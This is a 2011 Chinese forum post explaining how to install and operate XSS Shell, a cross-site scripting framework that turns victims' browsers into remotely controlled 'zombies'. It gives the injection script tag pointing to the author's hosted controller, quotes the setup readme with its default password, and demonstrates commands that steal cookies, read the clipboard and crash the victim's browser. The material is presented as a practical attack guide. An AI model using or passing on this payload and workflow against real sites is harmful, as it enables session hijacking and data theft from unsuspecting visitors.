XSS SHELL的安装和使用

bzcyer · 发表于 2011-3-9 11:01:40

本帖最后由 bzcyer 于 2011-3-9 11:04 编辑

@author Bzcyer

@ http://www.bzcyer.com/

1.安装
使用的是XSS Shell 0.38版『XSSShell038.zip』，最初用『xssshell-xsstunnell.zip』里面的『XSSShell - v0.6.2』，后台只能看到Commands，看不到Victims和Logs，没弄明白为什么。关于环境，在本机IIS上，不能用，所以传到博客上。
管理地址：http://www.bzcyer.com/xss2/xssshell/default.asp
Sapmle Victim：http://www.bzcyer.com/xss2/sample%5Fvictim/
<script src="http://www.bzcyer.com/xss2/xssshell.asp?v=336699"></script>
配置文件看下面，参考压缩包中的readme.txt，比较简单就不说了。

Install Admin Interface;
1. Copy "xssshell" folder into your web server
2. Copy "db" to a secure place (below root)
3. Configure "database path" from "xssshell/db.asp"
4. Modify hard coded password in db.asp [default password is : w00t]
5. Now you can access admin interface from something like [url=http://[yourhost]/xssshell/]http://[YOURHOST]/xssshell/[/url]

Configure XSS Shell for communication;
1. Open xssshell.asp
2. Set "SERVER" variable to where your XSSShell folder is located. i.e: "[url=http://[yourhost]/xssshell/]http://[YOURHOST]/xssshell/[/url]";
3. Be sure to check "ME", "CONNECTOR", "COMMANDS_URL" variables. If you changed filenames, folder names or some kind of different configuration you need modify them.
Now open your admin interface from your browser,
To test it, just modify "sample_victim/default.asp" source code and replace "http://attacker:81/release/xssshell.js" URL with your own XSS Shell URL. Open "sample_victim" folder in some other browser and may be upload in to some other server.
Now you should see a zombie in admin interface. Just write something into "parameters" textarea and click "alert()". You should see an alert message in victim's browser.

2.使用

首先把特定的脚本<script src="http://www.bzcyer.com/xss2/xssshell.asp?v=336699"></script>放到需要控制的页面，能写进XSS的地方应该都可以。在这里测试的话，用了XSS Shell自带的一个sample。
打开http://www.bzcyer.com/xss2/sample%5Fvictim/，脚本<script src="http://www.bzcyer.com/xss2/xssshell.asp?v=336699"></script>放到default.asp文件中。当有人打开页面的时候，可以在XSS Shell『http://www.bzcyer.com/xss2/xssshell/default.asp』里看到以下信息：

简单的用一下这些功能：
1.getCookie( )

2.alert(<message>) Parameters : 设置为“哈哈～还有其他更有意思的”

3.getClipboard()
复制下『copy from Clipboadr from www.bzcyer.com』，执行getClipboard()

4.Crash()
这个就不试了，用了这个命令，那IE就会直接死掉

当然也可以自己写一些JS，可以做很多事情。。

上一篇：jboss tomcat weblogic websphere 性能对比测试
下一篇：修改HTTP Post/get数据利器TamperIE（升级版）